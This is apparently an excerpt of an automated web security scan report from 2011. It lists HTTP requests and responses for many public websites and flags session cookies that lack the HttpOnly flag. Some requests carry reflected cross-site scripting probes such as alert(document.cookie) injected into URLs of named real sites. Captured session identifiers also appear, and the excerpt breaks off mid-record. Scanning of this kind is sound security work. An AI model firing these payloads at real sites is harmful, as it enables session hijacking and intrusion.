GET /ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:29 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:29 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:36 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:36 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /managemystuff.html HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
<p>Access thousands of manuals, user community, personal homepage, original blog content and newsletters!</p> <form onsubmit="javascript: submitRegistration('Popup'); return false;" id="sRegFormIdPopu ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: identi.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:50:12 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-3ubuntu4.6 Set-Cookie: PHPSESSID=e388a003ef12638804228edaa3f744b8; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: imera.com.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:54:46 GMT Server: Apache/2.2.6 (Fedora) Set-Cookie: JSESSIONID=3F0AAFD21BC620CD5628A56E4B94EB70; Path=/ Cache-Control: no-store, max-age=0, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 41531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MCIndex.asp HTTP/1.1 Host: info.bisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:01:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 363 Content-Type: text/html Set-Cookie: MCIDtype=external; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: MCIDCookie=9505; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCABBARTR=LOJKGAOCENEJFOGJELJDONMB; path=/ Cache-control: private
<html> <head> <meta name="GENERATOR" content="Microsoft Visual Studio 6.0"> </head> <body> <script language=javascript> <!-- var strRedir = "http://www.EducatorEducation.com/?source=196337ZX ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /opt_out/ch_optout.asp HTTP/1.1 Host: intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3422 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=HFEGFMCCJNCMNPGAHAKHLIGI; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:51:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /s/svrg.asp HTTP/1.1 Host: internetmailmanager.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:51:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 115 Content-Type: text/html Set-Cookie: ASPSESSIONIDAABCDBSC=LIBJGAECDANCKFHGFFNBFDND; path=/ Cache-control: private
Invalid registration form. Please contact support at <a href="mailto:support@303media.com">support@303media.com</a>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webtracker/track.html HTTP/1.1 Host: live.activeconversion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _wt_31021=1296942871924|f64d-6178-34ed-5f2e12df7d201ca|0; JSESSIONID=9042D11EABAF4C8F5DEB02F41173999D;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 22:51:18 GMT Server: Apache Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=E261474CC942CC59A3C7A67CA36366D2; Path=/webtracker Location: http://live.activeconversion.com/webtracker/mainMenu.html Content-Length: 0 Connection: close Content-Type: text/html;charset=ISO-8859-1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webtracker/track2.html?method=track&pid=31021&uclkt=1&alh=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&avc=f64d-6178-34ed-5f2e12df7d201ca&source=&keyword=&ref=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&pageTitle=Ownership%20Targeting%20%7C%20OwnerIQ&pageUrl=http%3A%2F%2Fwww.owneriq.com%2Fownership-targeting%3Fsrc%3D728x90_blue&java=1&amcs=0.41058127977885306 HTTP/1.1 Host: live.activeconversion.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:31:59 GMT Server: Apache Pragma: no-cache Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=3DD7C88CAE89EFB650276CE09BCE82B1; Path=/webtracker Set-Cookie: _wt_31021=1296945129219|f64d-6178-34ed-5f2e12df7d201ca|0; Max-Age=630720000;Path=/; HttpOnly P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM" Connection: close Content-Type: image/png Content-Length: 68
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=mgd19n2q9c9jnocqqmbrnk5p31; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php?v_sex='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000335)%3C/script%3E&v_exp=1&v_find=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: lovely-faces.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:13 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=mgd19n2q9c9jnocqqmbrnk5p31; path=/ Last-Modified: Sat, 05 Feb 2011 21:01:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: mad4milk.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:04:24 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229aa9caca178f871b7614d81a9de0e019%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1297008265%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Sun, 06-Feb-2011 18:04:25 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: multiply.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: newstrust.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Sat, 05 Feb 2011 22:58:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: _newstrust_session=0ce76bfbf0c27ac307c69589440188fd; path=/ Status: 200 OK ETag: "a62932024cf879d7f7427791eb6c7c8f" X-Runtime: 0.01216 Content-Length: 95979 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/lgpl-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/malayalam-kochupusthakam-free-download.html HTTP/1.1 Host: pdfdatabase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 06:11:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.10 Set-Cookie: PHPSESSID=e724f4995ab87e227b65ec2f714edd90; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 39330
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: phonefavs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:35 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=1b89eafffdaa51775d731fea3360282e; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 6511
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /$|zone.msn.com|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: photobucket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=1l5vulbvebogrm90n8ljmbpqf0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ping.fm Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <title> American Express - Mem ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regman/mem/initsession?sessionargs=YToyOntzOjM6InVyaSI7czoxMTQ6Ii9leC9tZmcvaGVhZGxpbmUvbS9hcmllbnM0Nzg4OCUyNTI3JTI1M2JhbGVydCUyNTI4ZG9jdW1lbnQuY29va2llJTI1MjklMjUyZiUyNTJmOGZjZjE2N2QyODEvZC90eXBlL3Byb2R1Y3RfcHJvYmxlbSI7czo2OiJzZXJ2ZXIiO3M6MzE6ImhvbWVhcHBsaWFuY2UubWFudWFsc29ubGluZS5jb20iO30, HTTP/1.1 Host: session.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders/?cid\u003dvibrantlogo4 HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/oss/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: sphinn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:59:23 GMT Server: Apache/2.2 Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22ebd855b093eff9801dff359c0bc0930d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296946763%3Bs%3A10%3A%22rememberme%22%3Bi%3A0%3B%7D28f3522411827ac80c00f312bf0c11e5; expires=Sun, 06-Feb-2011 00:59:23 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 57352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://open ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mw0305l/mywebex/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:59:22 GMT Server: Apache Content-Length: 3639 Set-Cookie: JSESSIONID=vG1dNNWKvTrnmZhJc7QHlY8p5PBcRt6fsv8sVgVQQ5zk46f6XVL2!-1021108312; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Set-Cookie: NSC_kmkcwxm=404467a20838;path=/ Connection: close Content-Type: text/html
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intellitxt/switch.asp?ipid=6648&state=query HTTP/1.1 Host: starpulse.us.intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=EDB4D23E026138AF23EF5F1050BE5C48; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 20 Date: Sat, 05 Feb 2011 23:01:19 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /t/v1/clk HTTP/1.1 Host: t.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="/t/v1/clk/cc">here</a>.</p> <hr> <address>Apach ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /trackalyze.asp?r=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&p=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&i=16592 HTTP/1.1 Host: t2.trackalyzer.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trackalyzer=123144565411843
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NA7/ats/careers/jobSearch.jsp HTTP/1.1 Host: tbe.taleo.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sat, 05 Feb 2011 23:01:21 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 31 Dec 1969 23:59:59 GMT Set-Cookie: JSESSIONID=8BBB3E3E4A16FEEEBAE957F8D88AD6A4.NA7_primary_jvm; Path=/NA7/ats Content-Length: 2209 Connection: close Content-Type: text/html;charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tipd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
